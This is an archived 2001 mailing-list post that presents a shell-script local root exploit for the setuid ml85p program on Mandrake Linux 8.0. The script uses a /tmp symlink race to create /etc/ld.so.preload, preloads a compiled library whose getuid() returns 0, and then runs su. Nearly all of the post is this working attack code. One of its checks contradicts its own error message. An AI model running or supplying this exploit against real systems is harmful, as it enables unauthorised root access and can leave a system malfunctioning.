Why code the exploit in C if you were just going to sprintf(); system() everything anyway? This is a bad exploit for a lame bug. I found this in april and wrote this exploit to muck around with /etc/ld.so.preload as a means of elevating privildges from symlink attacks locally. old news but still. this ml85 bug appears in Linux Mandrake 8.0. Thing is, this program is mode 4750 root:sys so whatever... suid ---- #!/bin/sh # Exploit using /usr/bin/ml85p default setuid program on # Mandrake Linux 8.0 # # You need to be in the sys group to be able to execute # ml85p. echo "** ml85p exploit" # set the required umask umask 0 # get the number of seconds since 1970 DATE=`date +"%s"` if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ] then echo "** this exploit requires that /usr/bin/ml85p is setuid and executable." exit 1 fi if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ] then echo "** this exploit requires that /etc/ld.so.preload does not exist." exit 1 fi echo "** creating file" ln -s /etc/ld.so.preload /tmp/ml85g"$DATE" echo "bleh" | /usr/bin/ml85p -s rm /tmp/ml85g"$DATE" echo "** creating shared library" cat << _EOF_ > /tmp/g.c int getuid(void) { return(0); } _EOF_ echo "** compiling and linking shared object" gcc -c -o /tmp/g.o /tmp/g.c ld -shared -o /tmp/g.so /tmp/g.o rm -f /tmp/g.c /tmp/g.o echo "** rigging ld.so.preload" echo "/tmp/g.so" > /etc/ld.so.preload echo "** execute su. warning all getuid() calls will return(0) until you remove" echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so without" echo "** first fixing /etc/ld.so.preload may result in system malfunction" su - echo "** cleaning up" > /etc/ld.so.preload rm -f /tmp/g.so
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 12:15:37 PDT